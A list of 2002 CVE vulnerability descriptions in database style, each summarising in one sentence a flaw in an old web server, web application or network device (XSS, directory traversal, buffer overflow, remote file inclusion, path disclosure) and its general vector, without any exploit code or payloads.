[CVE-2002-2246] Cross-site scripting (XSS) vulnerability in VisNetic Website before 3.5.15 allows remote attackers to inject arbitrary web script or HTML via the HTTP referer header (HTTP_REFERER) to a non-existent page, which is injected into the resulting 404 error page.
[CVE-2002-2241] Buffer overflow in httpd32.exe in Deerfield VisNetic WebSite before 3.5.15 allows remote attackers to cause a denial of service (crash) via a long HTTP OPTIONS request.
[CVE-2002-2231] Cross-site scripting (XSS) vulnerability in Ikonboard 3.1.1 allows remote attackers to inject arbitrary web script or HTML via (1) a javascript: URL in a photo URL or (2) an X-Forwarded-For: header.
[CVE-2002-2230] Cross-site scripting (XSS) vulnerability in Ikonboard 3.1.1 allows remote attackers to inject arbitrary web script or HTML via a private message with a javascript: URL in the IMG tag, in which the URL ends in a ".gif" or ".jpg" string, a variant of CVE-2002-0328.
[CVE-2002-2229] Directory traversal vulnerability in Sapio Design Ltd. WebReflex 1.53 allows remote attackers to read arbitrary files via a .. in an HTTP request.
[CVE-2002-2217] Multiple PHP remote file inclusion vulnerabilities in Web Server Creator - Web Portal (WSC-WebPortal) 0.1 allow remote attackers to execute arbitrary PHP code via a URL in the (1) l parameter to customize.php or the (2) pg parameter to index.php.
[CVE-2002-2216] Soft3304 04WebServer before 1.20 does not properly process URL strings, which allows remote attackers to obtain unspecified sensitive information.
[CVE-2002-2205] Buffer overflow in Webresolve 0.1.0 and earlier allows remote attackers to execute arbitrary code by connecting to the server from an IP address that resolves to a long hostname.
[CVE-2002-2201] The Printer Administration module for Webmin 0.990 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the printer name.
[CVE-2002-2193] Cross-site scripting (XSS) vulnerability in mojo.cgi for Mojo Mail 2.7 allows remote attackers to inject arbitrary web script via the email parameter.
[CVE-2002-2192] Cross-site scripting (XSS) vulnerability in Perception LiteServe 2.0.1 allows remote attackers to execute arbitrary web script via (1) a Host: header when DNS wildcards are supported or (2) the query string in a "dir" request to indexed folders.
[CVE-2002-2190] ArtsCore Studios CuteCast Forum 1.2 stores passwords in plaintext under the web document root, which allows remote attackers to obtain the passwords via an HTTP request to a .user file.
[CVE-2002-2189] Cross-site scripting (XSS) vulnerability in ActiveXperts Software ActiveWebserver allows remote attackers to execute arbitrary web script via a link.
[CVE-2002-2181] SonicWall Content Filtering allows local users to access prohibited web sites via requests to the web site's IP address instead of the domain name.
[CVE-2002-2178] Cross-site scripting (XSS) vulnerability in article.php module for phpWebSite 0.8.3 allows remote attackers to execute arbitrary Javascript script via the sid parameter, as demonstrated using an IMG tag.
[CVE-2002-2177] BEA WebLogic Server and Express 6.1 through 7.0.0.1 buffers HTTP requests in a way that can cause BEA to send the same response for two different HTTP requests, which could allow remote attackers to obtain sensitive information that was intended for other users.
[CVE-2002-2171] Cross-site scripting (XSS) vulnerability in acWEB 1.8 and 1.14 allows remote attackers to insert arbitrary HTML and web script via a URL, possibly via a "%db" request in a URL.
[CVE-2002-2170] Working Resources Inc. BadBlue Enterprise Edition 1.7 through 1.74 attempts to restrict administrator actions to the IP address of the local host, but does not provide additional authentication, which allows remote attackers to execute arbitrary code via a web page containing an HTTP POST request that accesses the dir.hts page on the localhost and adds an entire hard drive to be shared.
[CVE-2002-2166] Cross-site scripting (XSS) vulnerability in FuseTalk 2.0 and 3.0 allows remote attackers to insert arbitrary HTML and web script.
[CVE-2002-2165] The IMHO Webmail module 0.97.3 and earlier for Roxen leaks the REFERER from the browser's previous login session in an error page, which allows local users to read another user's inbox.
[CVE-2002-2158] zenTrack 2.0.3 and earlier allows remote attackers to obtain the full path to the web root via an invalid ticket ID, which leaks the path in an error message.
[CVE-2002-2152] The Czech edition of Software602's Web Server before 2002.0.02.0916 allows remote attackers to gain administrator privileges via direct HTTP requests to the /admin/ directory, which is not password protected.
[CVE-2002-2149] Buffer overflow in Lucent Access Point 300, 600, and 1500 Service Routers allows remote attackers to cause a denial of service (reboot) via a long HTTP request to the administrative interface.
[CVE-2002-2148] Lucent Ascend MAX Router 5.0 and earlier, Lucent Ascend Pipeline Router 6.0.2 and earlier, and Lucent DSLTerminator allow remote attackers to obtain sensitive information such as hostname, MAC, and IP address of the Ethernet interface via a discard (UDP port 9) packet, which causes the device to leak the information in the response.
[CVE-2002-2146] cgitest.exe in Savant Web Server 3.1 and earlier allows remote attackers to cause a denial of service (crash) via a long HTTP request.
[CVE-2002-2145] Savant Web Server 3.1 and earlier allows remote attackers to bypass authentication for password protected user folders via a URL with a hex encoded space (%20) and a '.' (%2e) at the end of the filename.
[CVE-2002-2144] Directory traversal vulnerability in BearShare 4.0.5 and 4.0.6 allows remote attackers to read files outside of the web root by hex-encoding the "/" (forward slash) or "." (dot) characters.
[CVE-2002-2143] The admin.html file in MySimple News 1.0 stores its administrative password in plaintext, which allows remote attackers to gain unauthorized access to the web server by viewing the source of admin.html.
[CVE-2002-2142] An undocumented extension for the Servlet mappings in the Servlet 2.3 specification, when upgrading to WebLogic Server and Express 7.0 Service Pack 1 from BEA WebLogic Server and Express 6.0 through 7.0.0.1, does not prepend a "/" character in certain URL patterns, which prevents the proper enforcement of role mappings and policies in applications that use the extension.
[CVE-2002-2141] BEA WebLogic Server and Express 7.0 and 7.0.0.1, when running Servlets and Enterprise JavaBeans (EJB) on more than one server, will remove the security constraints and roles on all servers for any Servlets or EJB that are used by an application that is undeployed on one server, which could allow remote attackers to conduct unauthorized activities in violation of the intended restrictions.
[CVE-2002-2134] haut.php in PEEL 1.0b allows remote attackers to execute arbitrary PHP code by modifying the dirroot parameter to reference a URL on a remote web server that contains the code in a lang.php file.
[CVE-2002-2130] publish_xp_docs.php in Gallery 1.3.2 allows remote attackers to execute arbitrary PHP code by modifying the GALLERY_BASEDIR parameter to reference a URL on a remote web server that contains the code.
[CVE-2002-2129] Cross-site scripting vulnerability (XSS) in editform.php for w-Agora 4.1.5 allows remote attackers to execute arbitrary web script via an arbitrary form field name containing the script, which is echoed back to the user when displaying the form.
[CVE-2002-2125] Internet Explorer 6.0 does not warn users when an expired certificate authority (CA) certificate is submitted to the user and a newer CA certificate is in the user's local repository, which could allow remote attackers to decrypt web sessions via a man-in-the-middle (MITM) attack.
[CVE-2002-2118] Buffer overflow in Blue World Lasso Web Data Engine 3.6.5 allows remote attackers to cause a denial of service via a long URL.
[CVE-2002-2115] Cross-site scripting (XSS) vulnerability in Hyper NIKKI System (HNS) Lite before 0.9 and HNS before 2.10-pl2 allows remote attackers to inject arbitrary web script or HTML.
[CVE-2002-2114] Artekopia Netjuke before 1.0 b7 allows remote attackers to execute arbitrary code on the web server, possibly via the section parameter, which is passed to an eval call.
[CVE-2002-2112] RCA Digital Cable Modem DCM225 and DCM225E, and other modems that must conform to the Data-over-Cable Service Interface Specifications DOCSIS standard, uses the "public" community string for SNMP access, which allows remote attackers to read or write MIB information.
[CVE-2002-2108] Unknown vulnerability in the "VAIO Manual" software in certain Sony VAIO personal computers sold from November 2001 to January 2002, allows remote attackers to modify data via a web page or HTML e-mail.
[CVE-2002-2107] Cross-site scripting (XSS) vulnerability in the lookup script in Veridis OpenKeyServer (OKS) 1.2 allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2002-2104] graph.php in Ganglia PHP RRD Web Client 1.0.2 allows remote attackers to execute arbitrary commands via the command parameter, which is provided to the passthru function.
[CVE-2002-2095] Joe Testa hellbent 01 webserver allows attackers to read files that are specified in the hellbent.prefs file by creating a file with a similar name in the web root, as demonstrated using (1) index.webroot and (2) index.ipallow.
[CVE-2002-2094] Joe Testa hellbent 01 allows remote attackers to determine the full path of the web root directory via a GET request with a relative path that includes the root's parent, which generates a 403 error message if the parent is incorrect, but a normal response if the parent is correct.
[CVE-2002-2086] Multiple cross-site scripting (XSS) vulnerabilities in magicHTML of SquirrelMail before 1.2.6 allow remote attackers to inject arbitrary web script or HTML via (1) "<<script" in unspecified input fields or (2) a javascript: URL in the src attribute of an IMG tag.
[CVE-2002-2085] Directory traversal vulnerability in page.cgi of WWWeBBB Forum 3.82 beta and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP request.
[CVE-2002-2074] SQL injection vulnerability in Mailidx before 20020105 allows remote attackers to execute arbitrary SQL commands via the search web page.
[CVE-2002-2073] Cross-site scripting (XSS) vulnerability in the default ASP pages on Microsoft Site Server 3.0 on Windows NT 4.0 allows remote attackers to inject arbitrary web script or HTML via the (1) ctr parameter in Default.asp and (2) the query string to formslogin.asp.
[CVE-2002-2065] WebCalendar 0.9.34 and earlier with 'browsing in includes directory' enabled allows remote attackers to read arbitrary include files with .inc extensions from the web root.
[CVE-2002-2064] isadmin.php in PhpWebGallery 1.0 allows remote attackers to gain administrative access by setting the photo_login cookie to pseudo.
[CVE-2002-2062] Cross-site scripting (XSS) vulnerability in ftp.htt in Internet Explorer 5.5 and 6.0, when running on Windows 2000 with "Enable folder view for FTP sites" and "Enable Web content in folders" selected, allows remote attackers to inject arbitrary web script or HTML via the hostname portion of an FTP URL.
[CVE-2002-2058] TeeKai Tracking Online 1.0 uses weak encryption of web usage statistics in data/userlog/log.txt, which allows remote attackers to identify IP's visiting the site by dividing each octet by the MD5 hash of '20'.
[CVE-2002-2057] TeeKai Forum 1.2 uses weak encryption of web usage statistics in data/member_log.txt, which is stored under the web document root with insufficient access control, which allows remote attackers to identify IP's visiting the site by dividing each octet by the MD5 hash of '20'.
[CVE-2002-2056] Cross-site scripting (XSS) vulnerability in TeeKai Forum 1.2 allows remote attackers to inject arbitrary web script or HTML via the valid_username_online cookie.
[CVE-2002-2055] Cross-site scripting (XSS) vulnerability in userlog.php in TeeKai Tracking Online 1.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2002-2054] TeeKai Forum 1.2 allows remote attackers to authenticate as the administrator and gain privileged web forum access by setting the valid_level cookie to admin.
[CVE-2002-2053] The design of the Hot Standby Routing Protocol (HSRP), as implemented on Cisco IOS 12.1, when using IRPAS, allows remote attackers to cause a denial of service (CPU consumption) via a router with the same IP address as the interface on which HSRP is running, which causes a loop.
[CVE-2002-2051] The processor_web plugin for ModLogAn 0.5.0 through 0.7.11, when used with the splitby option, allows local users to overwrite arbitrary files via a symlink attack on files specified as hostnames in a log file.
[CVE-2002-2050] Directory traversal vulnerability in processor_web plugin for ModLogAn 0.5.0 through 0.7.11, when used with the splitby option, allows local users to overwrite arbitrary files via a .. (dot dot) in the hostname of a log entry.
[CVE-2002-2045] x_stat_admin.php in x-stat 2.3 and earlier allows remote attackers to (1) execute PHP commands such as phpinfo or (2) obtain the full path of the web server via an invalid action parameter, which leaks the pathname in an error message.
[CVE-2002-2044] Cross-site scripting (XSS) vulnerability in x_stat_admin.php in x-stat 2.3 and earlier allows remote attackers to inject arbitrary web script or HTML via a parameter to the phpinfo action.
[CVE-2002-2024] Horde IMP 2.2.7 allows remote attackers to obtain the full web root pathname via an HTTP request for (1) poppassd.php3, (2) login.php3?reason=chpass2, (3) spelling.php3, and (4) ldap.search.php3?ldap_serv=nonsense which leaks the information in error messages.
[CVE-2002-2021] Cross-site scripting (XSS) vulnerability in WoltLab Burning Board (wbboard) 1.1.1 allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2002-2014] Lotus Domino 5.0.8 web server returns different error messages when a valid or invalid user is provided in HTTP requests, which allows remote attackers to determine valid user names and makes it easier to conduct brute force attacks.
[CVE-2002-2011] Cross-site scripting (XSS) vulnerability in the fom CGI program (fom.cgi) in Faq-O-Matic 2.711 and 2.712 allows remote attackers to inject arbitrary web script or HTML via the file parameter.
[CVE-2002-2010] Cross-site scripting (XSS) vulnerability in htsearch.cgi in htdig (ht://Dig) 3.1.5, 3.1.6, and 3.2 allows remote attackers to inject arbitrary web script or HTML via the words parameter.
[CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
[CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
[CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
[CVE-2002-2005] Unknown vulnerability in Java web start 1.0.1_01, 1.0.1, 1.0 and 1.0.1.01 (HP-UX 11.x only) allows attackers to gain access to restricted resources via unknown attack vectors.
[CVE-2002-1999] HP Praesidium Webproxy 1.0 running on HP-UX 11.04 VVOS could allow remote attackers to cause Webproxy to forward requests to the internal network via crafted HTTP requests.
[CVE-2002-1996] Cross-site scripting (XSS) vulnerability in PostNuke 0.71 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) name parameter in modules.php and (2) catid parameter in index.php.
[CVE-2002-1995] Cross-site scripting (XSS) vulnerability in phptonuke.php for PHP-Nuke allows remote attackers to inject arbitrary web script or HTML via the filnavn parameter.
[CVE-2002-1994] advserver.exe in Advanced Web Server (AdvServer) Professional 1.030000 allows remote attackers to cause a denial of service via multiple HTTP requests containing a single carriage return/line feed (CRLF) sequence.
[CVE-2002-1993] webbbs_post.pl in WebBBS 4 and 5.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the followup parameter.
[CVE-2002-1976] ifconfig, when used on the Linux kernel 2.2 and later, does not report when the network interface is in promiscuous mode if it was put in promiscuous mode using PACKET_MR_PROMISC, which could allow attackers to sniff the network without detection, as demonstrated using libpcap.
[CVE-2002-1965] Cross-site scripting (XSS) vulnerability in Errors.gsl in Imatix Xitami 2.5b4 and 2.5b5 allows remote attackers to inject arbitrary web script or HTML via the (1) Javascript events, as demonstrated via an onerror event in an IMG SRC tag or (2) User-Agent field in an HTTP GET request.
[CVE-2002-1960] Cross-site scripting (XSS) vulnerability in Cybozu Share360 1.1 allows remote attackers to inject arbitrary web script or HTML via an HTML link.
[CVE-2002-1958] Cross-site scripting (XSS) vulnerability in kmMail 1.0, 1.0a, and 1.0b allows remote attackers to inject arbitrary web script or HTML via (1) javascript in onmouseover or other attributes in "safe" HTML tags such as the "b" tag, or (2) the Subject field.
[CVE-2002-1954] Cross-site scripting (XSS) vulnerability in the phpinfo function in PHP 4.2.3 allows remote attackers to inject arbitrary web script or HTML via the query string argument, as demonstrated using soinfo.php.
[CVE-2002-1951] Buffer overflow in GoAhead WebServer 2.1 allows remote attackers to execute arbitrary code via a long HTTP GET request with a large number of subdirectories.
[CVE-2002-1950] Cross-site scripting (XSS) vulnerability in phpRank 1.8 allows remote attackers to inject arbitrary web script or HTML via the (1) the email parameter of add.php or (2) the banner URL (banurl parameter) in the main list.
[CVE-2002-1949] The Network Attached Storage (NAS) Administration Web Page for Iomega NAS A300U transmits passwords in cleartext, which allows remote attackers to sniff the administrative password.
[CVE-2002-1947] Webmin 0.21 through 1.0 uses the same built-in SSL key for all installations, which allows remote attackers to eavesdrop or hijack the SSL session.
[CVE-2002-1941] Buffer overflow in RadioBird WebServer 4 Everyone 1.28 allows remote attackers to cause a denial of service (crash) via a long HTTP GET request with the Host header set.
[CVE-2002-1931] Cross-site scripting (XSS) vulnerability in PHP Arena paFileDB 1.1.3 and 2.1.1 allows remote attackers to inject arbitrary web script or HTML via Javascript in the search string.
[CVE-2002-1929] Cross-site scripting (XSS) vulnerability in pafiledb.php in PHP Arena paFileDB 1.1.3 through 3.0 allows remote attackers to inject arbitrary web script or HTML via the query string in the (1) rate, (2) email, or (3) download actions.
[CVE-2002-1922] Cross-site scripting (XSS) vulnerability in global.php in Jelsoft vBulletin 2.0.0 through 2.2.8 allows remote attackers to inject arbitrary web script or HTML via the (1) $scriptpath or (2) $url variables.
[CVE-2002-1921] The default configuration of MySQL 3.20.32 through 3.23.52, when running on Windows, does set the bind address to the loopback interface, which allows remote attackers to connect to the database.
[CVE-2002-1912] SkyStream EMR5000 1.16 through 1.18 does not drop packets or disable the Ethernet interface when the buffers are full, which allows remote attackers to cause a denial of service (null pointer exception and kernel panic) via a large number of packets.
[CVE-2002-1907] TelCondex SimpleWebServer 2.06.20817 allows remote attackers to cause a denial of service (crash) via a long HTTP GET request.
[CVE-2002-1906] The web server for Polycom ViaVideo 2.2 and 3.0 allows remote attackers to cause a denial of service (CPU consumption) by sending incomplete HTTP requests and leaving the connections open.
[CVE-2002-1905] Buffer overflow in the web server of Polycom ViaVideo 2.2 and 3.0 allows remote attackers to cause a denial of service (crash) via a long HTTP GET request.
[CVE-2002-1901] Cross-site scripting (XSS) vulnerability in Bodo Bauer BBGallery 1.0 allows remote attackers to inject arbitrary web script or HTML via image tags.
[CVE-2002-1900] Cross-site scripting (XSS) vulnerability in Pinboard 1.0 allows remote attackers to inject arbitrary web script or HTML via tasklists.
[CVE-2002-1899] Cross-site scripting (XSS) vulnerability in IceWarp Web Mail 3.3.3 and 3.4.5 allows remote attackers to inject arbitrary web script or HTML via the "Full Name" (addressname) parameter.
[CVE-2002-1897] MyWebServer LLC MyWebServer 1.0.2 allows remote attackers to cause a denial of service (crash) via a long HTTP request, possibly triggering a buffer overflow.
[CVE-2002-1894] Cross-site scripting (XSS) vulnerability in viewtopic.php in phpBB 2.0.3 allows remote attackers to inject arbitrary web script or HTML via the highlight parameter.
[CVE-2002-1893] Cross-site scripting (XSS) vulnerability in ArGoSoft Mail Server Pro 1.8.1.9 allows remote attackers to inject arbitrary web script or HTML via the e-mail message.
[CVE-2002-1888] CommonName Toolbar 3.5.2.0 sends unqualified domain name requests to the CommonName organization and possibly other web servers for name resolution, which allows those organizations to obtain internal server names.
[CVE-2002-1886] TightAuction 3.0 stores config.inc under the web document root with insufficient access control, which allows remote attackers to obtain the database username and password.
[CVE-2002-1881] Macromedia Flash Player 4.0 r12 through 6.0.47.0 allows remote attackers to cause a denial of service (web browser crash) via malformed content in a Flash Shockwave (.SWF) file, as demonstrated by ROT13 encoding the body of the file but not the headers.
[CVE-2002-1877] NETGEAR FM114P allows remote attackers to bypass access restrictions for web sites via a URL that uses the IP address instead of the hostname.
[CVE-2002-1870] Simple Web Server (SWS) 0.0.4 through 0.1.0 does not properly handle when the recv function call fails, which may allow remote attackers to overwrite program data or perform actions on an uninitialized heap, leading to a denial of service and possibly code execution.
[CVE-2002-1866] Simple Web Server (SWS) 0.0.4 through 0.1.0 does not close file descriptors for 404 error messages, which could allow remote attackers to cause a denial of service (file descriptor exhaustion) via multiple requests for pages that do not exist.
[CVE-2002-1864] Directory traversal vulnerability in Simple Web Server (SWS) 0.0.4 through 0.1.0 allows remote attackers to read arbitrary files via a ".." (dot dot) in an HTTP request.
[CVE-2002-1861] Sybase Enterprise Application Server 4.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF.").
[CVE-2002-1860] Pramati Server 3.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF.").
[CVE-2002-1859] Orion Application Server 1.5.3, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF.").
[CVE-2002-1858] Oracle Oracle9i Application Server 1.0.2.2 and 9.0.2 through 9.0.2.0.1, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF.").
[CVE-2002-1857] jo! jo Webserver 1.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF.").
[CVE-2002-1856] HP Application Server 8.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF.").
[CVE-2002-1855] Macromedia JRun 3.0 through 4.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF.").
[CVE-2002-1853] Cross-site scripting (XSS) vulnerability in MyNewsGroups 0.4 and 0.4.1 allows remote attackers to inject arbitrary web script or HTML via the subject of a newsgroup post, which is not properly handled by (1) myarticles.php, (2) search.php, (3) stats.php, or (4) standard.lib.php.
[CVE-2002-1852] Cross-site scripting (XSS) vulnerability in Monkey 0.5.0 allows remote attackers to inject arbitrary web script or HTML via (1) the URL or (2) a parameter to test2.pl.
[CVE-2002-1845] Cross-site scripting (XSS) vulnerability in index.php in Yet Another Bulletin Board (YaBB) 1.40 and 1.41 allows remote attackers to inject arbitrary web script or HTML via the password (passwrd) parameter.
[CVE-2002-1834] The default configuration of Xerox DocuTech 6110 and DocuTech 6115 allows remote attackers to connect to the web server and (1) submit print jobs directly into the "print now" queue or (2) read the scanner job history.
[CVE-2002-1829] Cross-site scripting (XSS) vulnerability in codeparse.php in Open Bulletin Board (OpenBB) 1.0.0 RC3 allows remote attackers to inject arbitrary web script or HTML via (1) myhome.php, (2) an onerror attribute in an IMG tag (a variant of CVE-2002-0330), or (3) a glow tag.
[CVE-2002-1828] Savant Webserver 3.1 allows remote attackers to cause a denial of service (crash) via an HTTP GET request with a negative Content-Length value.
[CVE-2002-1824] Microsoft Internet Explorer 6.0, when handling an expired CA-CERT in a webserver's certificate chain during a SSL/TLS handshake, does not prompt the user before searching for and finding a newer certificate, which may allow attackers to perform a man-in-the-middle attack. NOTE: it is not clear whether this poses a vulnerability.
[CVE-2002-1822] IBM HTTP Server 1.0 on AS/400 allows remote attackers to obtain the path to the web root directory and other sensitive information, which is leaked in an error message when a request is made for a non-existent Java Server Page (JSP).
[CVE-2002-1808] Cross-site scripting (XSS) vulnerability in Meunity Community System 1.1 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag when creating a topic.
[CVE-2002-1807] Cross-site scripting (XSS) vulnerability in phpWebSite 0.8.3 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag.
[CVE-2002-1806] Cross-site scripting (XSS) vulnerability in Drupal 4.0.0 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag.
[CVE-2002-1805] Cross-site scripting (XSS) vulnerability in DaCode 1.2.0 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag.
[CVE-2002-1804] Cross-site scripting (XSS) vulnerability in NPDS 4.8 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag.
[CVE-2002-1803] Cross-site scripting (XSS) vulnerability in PHP-Nuke 6.0 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag.
[CVE-2002-1802] Cross-site scripting (XSS) vulnerability in Xoops 1.0 RC3 allows remote attackers to inject arbitrary web script or HTML via Javascript in an IMG tag when submitting news.
[CVE-2002-1801] ImageFolio 2.23 through 2.27 allows remote attackers to obtain sensitive information via a nonexistent image category, which leaks the web root in the resulting error message.
[CVE-2002-1799] Cross-site scripting (XSS) vulnerability in phpRank 1.8 allows remote attackers to inject arbitrary web script or HTML via the (1) email parameter to add.php or (2) banurl parameter.
[CVE-2002-1795] Cross-site scripting (XSS) vulnerability in connect.asp in Microsoft Terminal Services Advanced Client (TSAC) ActiveX control allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2002-1785] Cross-site scripting (XSS) vulnerability in Zeus Administration Server in Zeus Web Server 4.0 through 4.1r2 allows remote authenticated users to inject arbitrary web script or HTML via the section parameter to index.fcgi.
[CVE-2002-1780] BPM Studio Pro 4.2 by ALCATech GmbH includes a webserver that allows a remote attacker to cause a denial of service (crash) by sending a URL request for a MS-DOS device such as con. NOTE: it has been disputed that this and possibly other application-level DOS device issues stem from a bug in Windows, and as such, such applications should not be considered vulnerable themselves.
[CVE-2002-1733] Cross-site scripting (XSS) vulnerability in the web-based message board in Prospero Technologies allows remote attackers to inject arbitrary web script or HTML via a message board post.
[CVE-2002-1732] Multiple cross-site scripting (XSS) vulnerabilities in Actinic Catalog 4.7.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string argument to certain .pl files, (2) the REFPAGE parameter to ca000007.pl, (3) PRODREF parameter to ss000007.pl, or (4) hop parameter to ca000001.pl.
[CVE-2002-1729] Cross-site scripting vulnerability (XSS) in ASPjar Guestbook 1.00 allows remote attackers to execute arbitrary script as other users via the "web site" parameter in a guestbook message.
[CVE-2002-1728] askSam Web Publisher 1.0 and 4.0 allows remote attackers to determine the full path to the web root directory via a request for a file that does not exist, which generates an error message that reveals the full path.
[CVE-2002-1727] Cross-site scripting vulnerability (XSS) in (1) as_web.exe and (2) as_web4.exe in askSam Web Publisher 1 and 4 allows remote attackers to execute arbitrary script as other users via a URL.
[CVE-2002-1710] The attachment capability in Compose Mail in BasiliX Webmail 1.1.0 does not check whether the attachment was uploaded by the user or came from a HTTP POST, which could allow local users to steal sensitive information like a password file.
[CVE-2002-1709] SQL injection vulnerability in BasiliX Webmail 1.10 allows remote attackers to obtain sensitive information or possibly modify data via the id variable.
[CVE-2002-1708] Cross-site scripting vulnerability (XSS) in BasiliX Webmail 1.10 allows remote attackers to execute arbitrary script as other users by injecting script into the (1) subject or (2) message fields.
[CVE-2002-1707] install.php in phpBB 2.0 through 2.0.1, when "allow_url_fopen" and "register_globals" variables are set to "on", allows remote attackers to execute arbitrary PHP code by modifying the phpbb_root_dir parameter to reference a URL on a remote web server that contains the code.
[CVE-2002-1706] Cisco IOS software 11.3 through 12.2 running on Cisco uBR7200 and uBR7100 series Universal Broadband Routers allows remote attackers to modify Data Over Cable Service Interface Specification (DOCSIS) settings via a DOCSIS file without a Message Integrity Check (MIC) signature, which is approved by the router.
[CVE-2002-1704] Zeroboard 4.1, when the "allow_url_fopen" and "register_globals" variables are enabled, allows remote attackers to execute arbitrary PHP code by modifying the _zb_path parameter to reference a URL on a remote web server that contains the code.
[CVE-2002-1680] Cross-site scripting (XSS) vulnerability in CGI Online Worldweb Shopping 1.1 (a.k.a. COWS) allows remote attackers to execute arbitrary script as other users by injecting script into (1) diagnose.cgi or (2) compatible.cgi.
[CVE-2002-1677] 14all.cgi 1.1p15 in mrtgconfig allows remote attackers to determine the physical path to the web root directory via a request with an invalid cfg parameter, which generates an error message that reveals the path.
[CVE-2002-1672] Webmin 0.92, when installed from an RPM, creates /var/webmin with insecure permissions (world readable), which could allow local users to read the root user's cookie-based authentication credentials and possibly hijack the root user's session using the credentials.
[CVE-2002-1655] The Web Publishing feature in Netscape Enterprise Server 3.x and iPlanet Web Server 4.x allows remote attackers to cause a denial of service (crash) via a wp-html-rend request.
[CVE-2002-1654] iPlanet Web Server Enterprise Edition and Netscape Enterprise Server 4.0 and 4.1 allows remote attackers to conduct HTTP Basic Authentication via the wp-force-auth Web Publisher command, which provides a distinct attack vector and may make it easier to conduct brute force password guessing without detection.
[CVE-2002-1651] Cross-site scripting (XSS) vulnerability in Verity Search97 allows remote attackers to insert arbitrary web content and steal sensitive information from other clients, possibly due to certain error messages from template pages that use the (1) vformat or (2) vfilter functions.
[CVE-2002-1647] The quick login feature in Slash Slashcode does not redirect the user to an alternate URL when the wrong password is provided, which makes it easier for remote web sites to guess the proper passwords by reading the username and password from the Referrer URL.
[CVE-2002-1641] Multiple buffer overflows in Oracle Web Cache for Oracle 9i Application Server (9iAS) allow remote attackers to execute arbitrary code via unknown vectors.
[CVE-2002-1640] Multiple cross-site scripting (XSS) vulnerabilities in Oracle Configurator before 11.5.7.17.32 and 11.5.6.16.53 allows remote attackers to inject arbitrary web script or HTML via (1) Text Features in the DHTML UI or (2) the test parameter to the oracle.apps.cz.servlet.UiServlet servlet.
[CVE-2002-1636] Cross-site scripting (XSS) vulnerability in the htp PL/SQL package for Oracle 9i Application Server (9iAS) allows remote attackers to inject arbitrary web script or HTML via the cbuf parameter to htp.print.
[CVE-2002-1634] Novell NetWare 5.1 installs sample applications that allow remote attackers to obtain sensitive information via (1) ndsobj.nlm, (2) allfield.jse, (3) websinfo.bas, (4) ndslogin.pl, (5) volscgi.pl, (6) lancgi.pl, (7) test.jse, or (8) env.pl.
[CVE-2002-1625] Macromedia Flash Player 6 does not terminate connections when the user leaves the web page, which allows remote attackers to cause a denial of service (bandwidth, resource, and CPU consumption) via the (1) loadMovie or (2) loadSound commands, which continue to execute until the browser is closed.
[CVE-2002-1624] Buffer overflow in Lotus Domino web server before R5.0.10, when logging to DOMLOG.NSF, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP Authenticate header containing certain non-ASCII characters.
[CVE-2002-1603] GoAhead Web Server 2.1.7 and earlier allows remote attackers to obtain the source code of ASP files via a URL terminated with a /, \, %2f (encoded /), %20 (encoded space), or %00 (encoded null) character, which returns the ASP source code unparsed.
[CVE-2002-1601] The Connectables feature in Adobe PhotoDeluxe 3.1 prepends the Adobe directory to the CLASSPATH environment variable, which allows applets to run with higher privileges and remote attackers to gain privileges via an HTML e-mail message or a web page.
[CVE-2002-1597] Cisco SN 5420 Storage Router 1.1(5) and earlier allows remote attackers to cause a denial of service (halt) via a fragmented packet to the Gigabit interface.
[CVE-2002-1590] The Web-Based Enterprise Management (WBEM) packages (1) SUNWwbdoc, (2) SUNWwbcou, (3) SUNWwbdev and (4) SUNWmgapp packages, when installed using Solaris 8 Update 1/01 or later, install files with world or group write permissions, which allows local users to gain root privileges or cause a denial of service.
[CVE-2002-1585] Unknown vulnerability in Solaris 8 for Intel and Solaris 8 and 9 for SPARC allows remote attackers to cause a denial of service via certain packets that cause some network interfaces to stop responding to TCP traffic.
